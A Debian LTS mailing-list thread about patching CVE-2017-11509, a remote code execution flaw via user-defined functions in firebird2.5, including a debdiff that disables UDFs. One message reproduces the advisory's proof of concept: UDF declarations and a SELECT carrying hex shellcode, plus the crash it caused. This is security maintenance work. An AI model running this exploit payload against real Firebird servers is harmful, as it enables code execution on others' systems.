Re: Wheezy update of firebird2.5?
Damyan Ivanov writes: > I have added you to https://salsa.debian.org/firebird-team/firebird2.5 > so feel free to push you work. Thanks! Ok, done. Packages are available for testing at: https://people.debian.org/~bam/debian/pool/main/f/firebird2.5/ -- Brian May
Re: Wheezy update of firebird2.5?
-=| Brian May, 08.05.2018 17:19:56 +1000 |=- > Damyan Ivanov writes: > > The only fix upstream has is to disable UDFs in firebird.conf -- > > https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch > > > > (probebly needs adaptation for firebird2.5, but you get the idea). > > The patch appears to apply fine without dramas. Attached is the debdiff > from the previous LTS release. > > Just compiling it now, but don't expect any problems. > > Damyan, > > Assuming I have write access to the firebird2.5 respository, do you have > any objections if I push my changes (including the previous LTS release) > to the wheezy branch in the git repository? Sure! I have added you to https://salsa.debian.org/firebird-team/firebird2.5 so feel free to push you work. Thanks! -- Damyan
Re: Wheezy update of firebird2.5?
Damyan Ivanov writes: > -=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=- >> I don't quite know where to go from here. I was somewhat hoping that >> Wheezy would be magically not vulnerable to this issue, but obviously, >> there's something wrong here that should probably be fixed. > > The only fix upstream has is to disable UDFs in firebird.conf -- > https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch > > (probebly needs adaptation for firebird2.5, but you get the idea). The patch appears to apply fine without dramas. Attached is the debdiff from the previous LTS release. Just compiling it now, but don't expect any problems. Damyan, Assuming I have write access to the firebird2.5 respository, do you have any objections if I push my changes (including the previous LTS release) to the wheezy branch in the git repository? Regards -- Brian May diff -Nru firebird2.5-2.5.2.26540.ds4/debian/changelog firebird2.5-2.5.2.26540.ds4/debian/changelog --- firebird2.5-2.5.2.26540.ds4/debian/changelog 2017-03-30 06:01:20.0 +1100 +++ firebird2.5-2.5.2.26540.ds4/debian/changelog 2018-05-07 17:39:32.0 +1000 @@ -1,3 +1,13 @@ +firebird2.5 (2.5.2.26540.ds4-1~deb7u4) UNRELEASED; urgency=high + + * Non-maintainer upload by the LTS Team. + * Disable UDFs in firebird.conf due to a remote authenticated code execution +vilnerability +https://www.tenable.com/security/research/tra-2017-36 (CVE-2017-11509) +http://tracker.firebirdsql.org/browse/CORE-5518 + + -- Brian May Mon, 07 May 2018 17:39:32 +1000 + firebird2.5 (2.5.2.26540.ds4-1~deb7u3) wheezy-security; urgency=high * Non-maintainer upload by the LTS Security Team. diff -Nru firebird2.5-2.5.2.26540.ds4/debian/gbp.conf firebird2.5-2.5.2.26540.ds4/debian/gbp.conf --- firebird2.5-2.5.2.26540.ds4/debian/gbp.conf 2013-07-23 08:21:41.0 +1000 +++ firebird2.5-2.5.2.26540.ds4/debian/gbp.conf 2018-05-07 17:39:32.0 +1000 @@ -1,2 +1,2 @@ [DEFAULT] -debian-branch=master +debian-branch=wheezy diff -Nru firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch --- firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch 1970-01-01 10:00:00.0 +1000 +++ firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch 2018-05-07 17:39:32.0 +1000 @@ -0,0 +1,23 @@ +Description: disable UDFs in firebird.conf + UDFs can be used for remote code execution. see + https://www.tenable.com/security/research/tra-2017-36 (CVE-2017-11509) + http://tracker.firebirdsql.org/browse/CORE-5518 +Author: Damyan Ivanov +Forwarded: no, because upstream doesn't consider this to be a problem + +Index: firebird2.5/builds/install/misc/firebird.conf.in +=== +--- firebird2.5.orig/builds/install/misc/firebird.conf.in firebird2.5/builds/install/misc/firebird.conf.in +@@ -137,7 +137,10 @@ + # + # Type: string (special format) + # +-#UdfAccess = Restrict UDF ++# Debian maintainer note: UDFs can be used for remote code execution as the ++# 'firebird' user. See https://www.tenable.com/security/research/tra-2017-36 ++# (CVE-2017-11509) ++UdfAccess = None + + + # diff -Nru firebird2.5-2.5.2.26540.ds4/debian/patches/series firebird2.5-2.5.2.26540.ds4/debian/patches/series --- firebird2.5-2.5.2.26540.ds4/debian/patches/series 2017-03-30 02:09:54.0 +1100 +++ firebird2.5-2.5.2.26540.ds4/debian/patches/series 2018-05-07 17:39:32.0 +1000 @@ -19,3 +19,4 @@ out/crash-create-db-restricted.patch upstream/r60322-remote-crash.patch CVE-2017-6369.patch +CVE-2017-11509.patch
Re: Wheezy update of firebird2.5?
-=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=- > I don't quite know where to go from here. I was somewhat hoping that > Wheezy would be magically not vulnerable to this issue, but obviously, > there's something wrong here that should probably be fixed. The only fix upstream has is to disable UDFs in firebird.conf -- https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch (probebly needs adaptation for firebird2.5, but you get the idea). -- dam
Re: Wheezy update of firebird2.5?
On 2018-04-04 19:54:14, Damyan Ivanov wrote: > -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=- >> Dear maintainer(s), >> >> The Debian LTS team would like to fix the security issues which are >> currently open in the Wheezy version of firebird2.5: >> https://security-tracker.debian.org/tracker/source-package/firebird2.5 >> >> Would you like to take care of this yourself? > > Sorry, no. > > AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the > security team advised against updating that for stable, and the issue > is still open in unstable. > > According to the researchers discovering it, upstream refused to fix > it :( so the only "fix" I am aware of is the change in the default > config to disable the vulnerable functionality. You can find the patch > for firebird3.0 at > https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698 > > It is perhaps not directly applicable to firebid2.5, but should help > regardless. I tried digging into this issue a little further, and couldn't get far. I always have this hurdle to just setup a test environment with Firebird, so I figured I would share the procedure here for the future, so that I wouldn't have to rebuild this from scratch every time. 1. install the database and packages: apt-get install firebird2.5-examples firebird2.5-dev firebird2.5-superclassic 2. set a admin password and configure the server: dpkg-reconfigure firebird2.5-superclassic 3. deploy a test database: gunzip -c /usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > /var/lib/firebird/2.5/data/employee.fdb chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb 4. connect to the database, in a `isql-fb` prompt: SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 'SYSDBA' password 'password'; Then you can do stuff like `SHOW TABLES` and so on. In particular, I have tried to reproduce the issue and I can confirm I can create two external functions with the same ENTRY_POINT, although the second snippet in the advisory has two `DECLARE` statements which I assume is a typo: DECLARE EXTERNAL FUNCTION string2blob VARCHAR(300) BY DESCRIPTOR, BLOB RETURNS PARAMETER 2 ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf' DECLARE EXTERNAL FUNCTION a6 VARCHAR(300) BY DESCRIPTOR, VARCHAR(400) BY DESCRIPTOR RETURNS INTEGER ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf' The actual query to trigger arbitrary code execution seems to fail, however: SQL> select a6((select x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7' from rdb$database), (select x'C8FD8503' from rdb$database)) from rdb$databaseStatement failed, SQLSTATE = 08006 Unable to complete network request to host "localhost". -Error writing data to the connection. Considering it was crafted to start `CALC.EXE` in Windows, that might be expected. We do see a segfault in the logs however: wheezy Tue Apr 17 16:49:56 2018 The user defined function: A6 referencing entrypoint: string2blob in module: fbudf caused the fatal exception: Segmentation Fault. The code attempted to access memory without privilege to do so. This exception will cause the Firebird server to terminate abnormally. ... which is probably a bad sign. I don't quite know where to go from here. I was somewhat hoping that Wheezy would be magically not vulnerable to this issue, but obviously, there's something wrong here that should probably be fixed. A. -- Every time I see an adult on a bicycle I no longer despair for the future of the human race. - H. G. Wells
Re: Wheezy update of firebird2.5?
-=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=- > Dear maintainer(s), > > The Debian LTS team would like to fix the security issues which are > currently open in the Wheezy version of firebird2.5: > https://security-tracker.debian.org/tracker/source-package/firebird2.5 > > Would you like to take care of this yourself? Sorry, no. AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the security team advised against updating that for stable, and the issue is still open in unstable. According to the researchers discovering it, upstream refused to fix it :( so the only "fix" I am aware of is the change in the default config to disable the vulnerable functionality. You can find the patch for firebird3.0 at https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698 It is perhaps not directly applicable to firebid2.5, but should help regardless. Good luck!
Re: Wheezy update of firebird2.5?
-=| Ola Lundqvist, 25.03.2017 22:46:35 +0100 |=- > Dear maintainer(s), > > The Debian LTS team would like to fix the security issues which are > currently open in the Wheezy version of firebird2.5: > https://security-tracker.debian.org/tracker/CVE-2017-6369 Please feel free to take this over writh the great LTS team. In case it would be of any help, the changes needed for the jessie upload are available at https://anonscm.debian.org/cgit/pkg-firebird/2.5.git/log/?h=jessie -- dam signature.asc Description: Digital signature